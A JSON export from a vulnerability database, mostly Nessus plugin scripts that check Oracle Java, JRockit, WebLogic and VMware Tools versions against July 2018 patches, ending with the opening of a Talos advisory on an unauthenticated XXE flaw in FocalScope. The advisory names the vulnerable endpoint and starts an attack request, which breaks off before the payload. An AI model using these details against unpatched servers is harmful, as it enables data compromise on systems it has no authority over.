"modified": "2018-07-20T00:00:00", "cpe": ["cpe:/a:oracle:jrockit"], "id": "ORACLE_JROCKIT_CPU_JUL_2018.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111214", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111214);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/07/20 19:22:00\");\n\n script_cve_id(\n \"CVE-2018-2938\",\n \"CVE-2018-2940\",\n \"CVE-2018-2941\",\n \"CVE-2018-2942\",\n \"CVE-2018-2952\",\n \"CVE-2018-2964\",\n \"CVE-2018-2972\",\n \"CVE-2018-2973\"\n );\n script_bugtraq_id(\n \"104774\",\n \"104768\",\n \"104775\",\n \"104781\",\n \"104765\",\n \"104780\",\n \"104782\",\n \"104773\"\n );\n script_xref(name:\"IAVA\", value:\"2018-A-0227\");\n\n script_name(english:\"Oracle JRockit R28.3.18 Multiple Vulnerabilities (July 2018 CPU)\");\n script_summary(english:\"Checks the version of jvm.dll.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A programming platform installed on the remote Windows host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle JRockit installed on the remote Windows host is\nR28.3.18. It is, therefore, affected by multiple vulnerabilities.\nSee advisory for details.\");\n # http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?50f36723\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle JRockit version R28.3.19 or later as referenced in\nthe July 2018 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_attribute(attribute:'cvss_score_source', value:\"CVE-2018-2938\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jrockit\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_jrockit_installed.nasl\");\n script_require_keys(\"installed_sw/Oracle JRockit\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Oracle JRockit\";\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\nver = install['version'];\ntype = install['type'];\npath = install['path'];\n\nif (tolower(type) != \"jdk\") audit(AUDIT_INST_PATH_NOT_VULN, app, ver, path);\n\nif (ver =~ \"^28(\\.3)?$\") audit(AUDIT_VER_NOT_GRANULAR, app, ver);\nif (ver !~ \"^28\\.3($|[^0-9])\") audit(AUDIT_NOT_INST, app + \" 28.3.x\");\n\n# Affected :\n# 28.3.18\nif (ver =~ \"^28\\.3\\.18($|[^0-9])\")\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n # The DLL we're looking at is a level deeper in the JDK, since it\n # keeps a subset of the JRE in a subdirectory.\n if (tolower(type) == \"jdk\") path += \"\\jre\";\n path += \"\\bin\\jrockit\\jvm.dll\";\n\n report =\n '\\n Type : ' + type +\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : 28.3.19' +\n '\\n';\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app, ver, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-21T11:43:40", "references": ["http://www.nessus.org/u?50f36723"], "pluginID": "111209", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities", "edition": 1, "reporter": "Tenable", "published": "2018-07-20T00:00:00", "title": "Oracle WebLogic Server Multiple Vulnerabilities (July 2018 CPU)", "type": "nessus", "enchantments": {"score": {"modified": "2018-07-21T11:43:40", "vector": "NONE", "value": 7.5}}, "naslFamily": "Misc.", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2935", "CVE-2018-2893", "CVE-2018-1275", "CVE-2018-7489", "CVE-2018-2894", "CVE-2018-2998", "CVE-2018-2987", "CVE-2018-2933"], "modified": "2018-07-20T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server", "cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2018.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111209", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111209);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/07/20 18:49:37\");\n\n script_cve_id(\n \"CVE-2018-1275\",\n \"CVE-2018-7489\",\n \"CVE-2018-2893\",\n \"CVE-2018-2894\",\n \"CVE-2018-2933\",\n \"CVE-2018-2935\",\n \"CVE-2018-2987\",\n \"CVE-2018-2998\"\n );\n script_bugtraq_id( \n 103771,\n 103203,\n 104817 \n );\n script_xref(name:\"IAVA\", value:\"2018-A-0226\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (July 2018 CPU)\");\n script_summary(english:\"Checks for the patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities \");\n # http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?50f36723\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2018 Oracle\nCritical Patch Update advisory.\n\nRefer to Oracle for any additional patch instructions or\nmitigation options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_attribute(attribute:'cvss_score_source', value:\"manual\");\n script_set_attribute(attribute:'cvss_score_rationale', value:\"Tenable's default values of unauthenticated remote code execution vulnerabilities.\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"obj.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\npatches = NULL;\n\nif ( !empty_or_null(ohome) && !empty_or_null(version))\n patches = get_kb_list('Oracle/WLS/*'+ohome+'*'+ version +'/installed/patch');\n\nfix = NULL;\nfix_ver = NULL;\n\n# individual security patches\nif (version =~ \"^12\\.2\\.1\\.3($|[^0-9])\")\n{\n fix_ver = \"12.2.1.3.180717\";\n fix = \"27912627\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.2($|[^0-9])\")\n{\n fix_ver = \"12.2.1.2.180717\";\n fix = \"27741413\";\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = \"12.1.3.0.180717\";\n fix = \"27919943\";\n}\nelse if (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = \"10.3.6.0.180717\";\n fix = \"B47X\"; # patchid is obtained from the readme and 10.3.6.x assets are different \n}\nall_patches = '';\nVULN=TRUE;\nforeach patch (patches)\n{\n all_patches += patch + \" \"; \n if (fix == patch) VULN=FALSE;\n}\n\nif (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1 && VULN )\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if ('windows' >< tolower(os))\n {\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n }\n else port = 0;\n if (!empty_or_null(all_patches))\n report =\n '\\n Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Required Patch : ' + fix +\n '\\n Patches Installed : ' + all_patches +\n '\\n';\n else\n report =\n '\\n Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Required Patch : ' + fix +\n '\\n';\n \n security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir + \" \" + ohome + \" + has patches [\" + all_patches + '] and');\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-07-21T12:02:19", "references": ["http://www.nessus.org/u?4f2226dc", "http://www.nessus.org/u?457b5e5e", "http://www.nessus.org/u?dbb3b1db", "http://www.nessus.org/u?726f7054", "http://www.nessus.org/u?ef524bbb"], "pluginID": "111162", "description": "The version of Oracle (formerly Sun) Java SE or Java for Business installed on the remote host is prior to 10 Update 2, 8 Update 181, 7 Update 191, or 6 Update 201. It is, therefore, affected by multiple vulnerabilities related to the following components :\n\n - Concurrency\n - Deployment\n - JSSE\n - Java DB\n - JavaFX\n - Libraries\n - Security\n - Windows DLL", "edition": 1, "reporter": "Tenable", "published": "2018-07-20T00:00:00", "title": "Oracle Java SE Multiple Vulnerabilities (July 2018 CPU) (Unix)", "type": "nessus", "enchantments": {"score": {"modified": "2018-07-21T12:02:19", "vector": "NONE", "value": 7.5}}, "naslFamily": "Misc.", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2938", "CVE-2018-2973", "CVE-2018-2964", "CVE-2018-2972", "CVE-2018-2941", "CVE-2018-2940", "CVE-2018-2952"], "modified": "2018-07-20T00:00:00", "cpe": ["cpe:/a:oracle:jre", "cpe:/a:oracle:jdk"], "id": "ORACLE_JAVA_CPU_JUL_2018_UNIX.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111162", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111162);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/07/20 17:04:00\");\n\n script_cve_id(\n \"CVE-2018-2938\",\n \"CVE-2018-2940\",\n \"CVE-2018-2941\",\n \"CVE-2018-2952\",\n \"CVE-2018-2964\",\n \"CVE-2018-2972\",\n \"CVE-2018-2973\"\n );\n script_bugtraq_id(\n 104765,\n 104768,\n 104773,\n 104774,\n 104775,\n 104780,\n 104782\n );\n script_xref(name:\"IAVA\", value:\"2018-A-0227\");\n\n script_name(english:\"Oracle Java SE Multiple Vulnerabilities (July 2018 CPU) (Unix)\");\n script_summary(english:\"Checks the version of the JRE.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Unix host contains a programming platform that is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle (formerly Sun) Java SE or Java for Business\ninstalled on the remote host is prior to 10 Update 2, 8 Update 181,\n7 Update 191, or 6 Update 201. It is, therefore, affected by multiple\nvulnerabilities related to the following components :\n\n - Concurrency\n - Deployment\n - JSSE\n - Java DB\n - JavaFX\n - Libraries\n - Security\n - Windows DLL\");\n # https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html#AppendixJAVA\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dbb3b1db\");\n # Java SE JDK and JRE 10 Update 2\n # http://www.oracle.com/technetwork/java/javase/10-0-2-relnotes-4477557.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ef524bbb\");\n # Java SE JDK and JRE 8 Update 181\n # http://www.oracle.com/technetwork/java/javase/8u181-relnotes-4479407.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?457b5e5e\");\n # Java SE JDK and JRE 7 Update 191\n # http://www.oracle.com/technetwork/java/javaseproducts/documentation/javase7supportreleasenotes-1601161.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f2226dc\");\n # Java SE JDK and JRE 6 Update 201\n # http://www.oracle.com/technetwork/java/javase/documentation/overview-156328.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?726f7054\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle JDK / JRE 10 Update 2, 8 Update 181 / 7 Update 191 /\n6 Update 201 or later. If necessary, remove any affected versions.\n\nNote that an Extended Support contract with Oracle is needed to obtain\nJDK / JRE 6 Update 95 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdk\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sun_java_jre_installed_unix.nasl\");\n script_require_keys(\"Host/Java/JRE/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each installed JRE.\ninstalls = get_kb_list_or_exit(\"Host/Java/JRE/Unmanaged/*\");\n\ninfo = \"\";\nvuln = 0;\nvuln2 = 0;\ninstalled_versions = \"\";\ngranular = \"\";\n\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"Host/Java/JRE/Unmanaged/\";\n if (ver !~ \"^[0-9.]+\") continue;\n\n installed_versions = installed_versions + \" & \" + ver;\n\n # Fixes : (JDK|JRE) 10 Update 2 / 8 Update 181 / 7 Update 191 / 6 Update 201\n if (\n ver =~ '^1\\\\.6\\\\.0_([0-9]|[0-9][0-9]|1[0-9][0-9]|200)([^0-9]|$)' ||\n ver =~ '^1\\\\.7\\\\.0_([0-9]|[0-9][0-9]|1[0-8][0-9]|190)([^0-9]|$)' ||\n ver =~ '^1\\\\.8\\\\.0_([0-9]|[0-9][0-9]|1[0-7][0-9]|180)([^0-9]|$)' ||\n ver =~ '^1\\\\.10\\\\.0_(0[01]|0?[01])([^0-9]|$)'\n )\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.6.0_201 / 1.7.0_191 / 1.8.0_181 / 1.10.0_2\\n';\n }\n else if (ver =~ \"^[\\d\\.]+$\")\n {\n dirs = make_list(get_kb_list(install));\n foreach dir (dirs)\n granular += \"The Oracle Java version \"+ver+\" at \"+dir+\" is not granular enough to make a determination.\"+'\\n';\n }\n else\n {\n dirs = make_list(get_kb_list(install));\n vuln2 += max_index(dirs);\n }\n\n}\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report =\n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n if (granular) exit(0, granular);\n}\nelse\n{\n if (granular) exit(0, granular);\n\n installed_versions = substr(installed_versions, 3);\n if (vuln2 > 1)\n exit(0, \"The Java \"+installed_versions+\" installations on the remote host are not affected.\");\n else\n audit(AUDIT_INST_VER_NOT_VULN, \"Java\", installed_versions);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-21T12:12:24", "references": ["http://www.nessus.org/u?5fbb6d9b", "https://www.vmware.com/security/advisories/VMSA-2018-0017.html"], "pluginID": "111220", "description": "The version of VMware Tools installed on the remote Windows host is 10.x prior to 10.3.0. It is, therefore, affected by an information disclosure vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 1, "reporter": "Tenable", "published": "2018-07-20T00:00:00", "title": "VMware Tools 10.x < 10.3.0 Multiple Vulnerabilities (VMSA-2018-0017)", "type": "nessus", "enchantments": {"score": {"modified": "2018-07-21T12:12:24", "vector": "NONE", "value": 5.0}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-6969"], "modified": "2018-07-20T00:00:00", "cpe": ["cpe:/a:vmware:vmware_tools"], "id": "VMWARE_TOOLS_WIN_VMSA_2018_0017.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111220", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111220);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/07/20 20:14:45\");\n\n script_cve_id(\"CVE-2018-6969\");\n script_bugtraq_id(104737);\n script_xref(name:\"VMSA\", value:\"2018-0017\");\n script_xref(name:\"IAVB\", value:\"2018-B-0089\");\n\n script_name(english:\"VMware Tools 10.x < 10.3.0 Multiple Vulnerabilities (VMSA-2018-0017)\");\n script_summary(english:\"Checks the VMware Tools version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization tool suite is installed on the remote Windows host is\naffected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Tools installed on the remote Windows host\nis 10.x prior to 10.3.0. It is, therefore, affected by\nan information disclosure vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2018-0017.html\");\n # https://my.vmware.com/web/vmware/details?downloadGroup=VMTOOLS1030&productId=491\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5fbb6d9b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Tools version 10.3.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-6969\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vmware_tools\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_tools_installed.nbin\", \"vmware_vsphere_detect.nbin\",\"vmware_esxi_detection.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/VMware Tools\", \"Host/ESXi/checked\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nesx = get_kb_item(\"Host/ESXi\");\nif (esx)\n audit(AUDIT_HOST_NOT, \"affected\");\n\n\napp_info = vcf::get_app_info(app:\"VMware Tools\", win_local:TRUE);\n\nconstraints = [{ \"min_version\" : \"0\", \"fixed_version\" : \"10.3.0\" }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-21T12:37:50", "references": ["http://www.nessus.org/u?4f2226dc", "http://www.nessus.org/u?457b5e5e", "http://www.nessus.org/u?dbb3b1db", "http://www.nessus.org/u?726f7054", "http://www.nessus.org/u?ef524bbb"], "pluginID": "111163", "description": "The version of Oracle (formerly Sun) Java SE or Java for Business installed on the remote host is prior to 10 Update 2, 8 Update 181, 7 Update 191, or 6 Update 201. It is, therefore, affected by multiple vulnerabilities related to the following components :\n\n - Concurrency\n - Deployment\n - JSSE\n - Java DB\n - JavaFX\n - Libraries\n - Security\n - Windows DLL", "edition": 1, "reporter": "Tenable", "published": "2018-07-20T00:00:00", "title": "Oracle Java SE Multiple Vulnerabilities (July 2018 CPU)", "type": "nessus", "enchantments": {"score": {"modified": "2018-07-21T12:37:50", "vector": "NONE", "value": 7.5}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2938", "CVE-2018-2973", "CVE-2018-2942", "CVE-2018-2964", "CVE-2018-2972", "CVE-2018-2941", "CVE-2018-2940", "CVE-2018-2952"], "modified": "2018-07-20T00:00:00", "cpe": ["cpe:/a:oracle:jre", "cpe:/a:oracle:jdk"], "id": "ORACLE_JAVA_CPU_JUL_2018.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111163", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111163);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/07/20 17:04:00\");\n\n script_cve_id(\n \"CVE-2018-2938\",\n \"CVE-2018-2940\",\n \"CVE-2018-2941\",\n \"CVE-2018-2942\",\n \"CVE-2018-2952\",\n \"CVE-2018-2964\",\n \"CVE-2018-2972\",\n \"CVE-2018-2973\"\n );\n script_bugtraq_id(\n 104765,\n 104768,\n 104773,\n 104774,\n 104775,\n 104780,\n 104781,\n 104782\n );\n script_xref(name:\"IAVA\", value:\"2018-A-0227\");\n\n script_name(english:\"Oracle Java SE Multiple Vulnerabilities (July 2018 CPU)\");\n script_summary(english:\"Checks the version of the JRE.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a programming platform that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle (formerly Sun) Java SE or Java for Business\ninstalled on the remote host is prior to 10 Update 2, 8 Update 181,\n7 Update 191, or 6 Update 201. It is, therefore, affected by\nmultiple vulnerabilities related to the following components :\n\n - Concurrency\n - Deployment\n - JSSE\n - Java DB\n - JavaFX\n - Libraries\n - Security\n - Windows DLL\");\n # https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html#AppendixJAVA\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dbb3b1db\");\n # Java SE JDK and JRE 10 Update 2\n # http://www.oracle.com/technetwork/java/javase/10-0-2-relnotes-4477557.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ef524bbb\");\n # Java SE JDK and JRE 8 Update 181\n # http://www.oracle.com/technetwork/java/javase/8u181-relnotes-4479407.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?457b5e5e\");\n # Java SE JDK and JRE 7 Update 191\n # http://www.oracle.com/technetwork/java/javaseproducts/documentation/javase7supportreleasenotes-1601161.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f2226dc\");\n # Java SE JDK and JRE 6 Update 201\n # http://www.oracle.com/technetwork/java/javase/documentation/overview-156328.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?726f7054\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle JDK / JRE 10 Update 2, 8 Update 181 / 7 Update 191 /\n6 Update 201 or later. If necessary, remove any affected versions.\n\nNote that an Extended Support contract with Oracle is needed to obtain\nJDK / JRE 6 Update 95 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdk\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sun_java_jre_installed.nasl\");\n script_require_keys(\"SMB/Java/JRE/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each installed JRE.\ninstalls = get_kb_list_or_exit(\"SMB/Java/JRE/*\");\n\ninfo = \"\";\nvuln = 0;\ninstalled_versions = \"\";\n\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"SMB/Java/JRE/\";\n if (ver !~ \"^[0-9.]+\") continue;\n\n installed_versions = installed_versions + \" & \" + ver;\n\n # Fixes : (JDK|JRE) 10 Update 2 / 8 Update 181 / 7 Update 191 / 6 Update 201\n if (\n ver =~ '^1\\\\.6\\\\.0_([0-9]|[0-9][0-9]|1[0-9][0-9]|200)([^0-9]|$)' ||\n ver =~ '^1\\\\.7\\\\.0_([0-9]|[0-9][0-9]|1[0-8][0-9]|190)([^0-9]|$)' ||\n ver =~ '^1\\\\.8\\\\.0_([0-9]|[0-9][0-9]|1[0-7][0-9]|180)([^0-9]|$)' ||\n ver =~ '^1\\\\.10\\\\.0_(0[01]|0?[01])([^0-9]|$)'\n )\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.6.0_201 / 1.7.0_191 / 1.8.0_181 / 1.10.0_2\\n';\n }\n}\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report =\n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse\n{\n installed_versions = substr(installed_versions, 3);\n if (\" & \" >< installed_versions)\n exit(0, \"The Java \"+installed_versions+\" installations on the remote host are not affected.\");\n else\n audit(AUDIT_INST_VER_NOT_VULN, \"Java\", installed_versions);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "talos": [{"lastseen": "2018-07-20T17:04:07", "references": [], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0559\n\n## FocalScope XML External Entity Injection Vulnerability\n\n##### July 20, 2018\n\n##### CVE Number\n\nCVE-2018-3881\n\n### Summary\n\nAn exploitable unauthenticated XML external injection vulnerability was identified in FocalScope v2416. A unauthenticated attacker could submit a specially crafted web request to FocalScope's server that could cause an XXE, and potentially result in data compromise.\n\n### Tested Versions\n\nFocalScope v2416\n\n### Product URLs\n\n<http://www.focalscope.com/download.html>\n\n### CVSSv3 Score\n\n9.4 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H\n\n### CWE\n\nCWE-611: Improper Restriction of XML External Entity Reference ('XXE')\n\n### Details\n\nFocalScope v2416 and prior is vulnerable to an unauthenticated XML External Entity injection attack. The following XML payload was used to trigger the XXE:\n \n \n POST /emm/_cros_/xlogin.asp HTTP/1.1\n Host: [IP]\n Content-Length: 315\n Origin: http://[IP]\n User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) 